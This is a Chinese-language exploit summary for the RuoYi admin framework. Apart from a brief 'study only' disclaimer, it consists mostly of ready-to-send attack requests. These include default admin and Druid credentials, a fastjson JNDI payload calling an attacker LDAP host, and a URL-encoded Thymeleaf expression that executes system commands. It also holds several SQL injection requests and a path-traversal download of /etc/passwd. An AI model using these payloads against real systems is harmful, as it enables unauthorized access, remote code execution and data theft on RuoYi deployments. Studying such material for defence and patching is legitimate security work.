前言
声明:此文章仅做学习,未经授权严禁转载。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关
本文章只做简单汇总,在此感谢其他师傅的文章和分享
前置准备
环境搭建
下载:https://gitee.com/y_project/RuoYi
自行选择版本下载搭建
我这里使用的是别的师傅的搭建的站,就很少截图了
复现
弱口令
1
默认账号密码:admin/admin123 或 ry/admin123
druid监控默认账号信息
请求地址: /druid/*
控制台管理用户名和密码:ruoyi/123456
组件漏洞
根据上述组件信息,去查找对应漏洞fastjson1.2.74
shiro反序列化
找到默认密钥,然后使用shiro相关利用工具里即可
fastjson
漏洞点:系统工具–>代码生成–>导入–>用户和角色关联表—>修改->模版选择数表,其余的都选择用户ID,点击保存
在后面添加即可
POST /tool/gen/edit HTTP/1.1
params%5B@type%5D=org.apache.shiro.jndi.JndiObjectFactory¶ms%5BresourceName%5D=ldap://vps—ip/Evil
创建恶意类,具体可查看别的师傅分享的文章,我这里不是很会
Thymeleaf组件漏洞
漏洞影响:RuoYi <= v4.7.1
可知/demo/form/localrefresh/task 存在漏洞
本来是想弹计算器的,但毕竟不是我自己搞的站,就不作截图演示
POST /demo/form/localrefresh/task HTTP/1.1
fragment=header((${T (java.lang.Runtime).getRuntime().exec("需要执行的代码")}))
再对(${T (java.lang.Runtime).getRuntime().exec("需要执行的代码")})进行url编码处理
fragment=header(%28%24%7b%54%20%28%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%29%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%63%61%6c%63%22%29%7d%29)
sql注入
1
漏洞影响:RuoYi< 4.6.2
漏洞点:角色管理-》搜索
POST /system/role/list HTTP/1.1
pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=¶ms[beginTime]=¶ms[endTime]=¶ms[dataScope]=and
extractvalue(1,concat(0x7e,substring((select database()),1,32),0x7e))
或者
POST /system/dept/edit HTTP/1.1
DeptName=1&DeptId=100&ParentId=12&Status=0&OrderNum=1&ancestors=0)or(extractvalue(1,concat((select user()))));#
或者
POST /system/role/export HTTP/1.1
params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))
2
漏洞影响:4.7.0<x<4.7.5
漏洞点:后台 com/ruoyi/generator/controller/GenController 下的/tool/gen/createTable路由存在sql注入
sql=CREATE table ss1 as SELECT/**/* FROM sys_job WHERE 1=1 union/**/SELECT/**/extractvalue(1,concat(0x7e,(select/**/version()),0x7e));
任意文件下载
RuoYi<4.5.1
/common/download/resource?resource=/profile/../../../../etc/passwd
/common/download/resource?resource=/profile/../../../../Windows/win.ini
/common/download/resource?resource=/profile/../../../../xxx
监控信息泄露
swagger
http://xxx/swagger-ui.html
http://xx/v2/api-docs
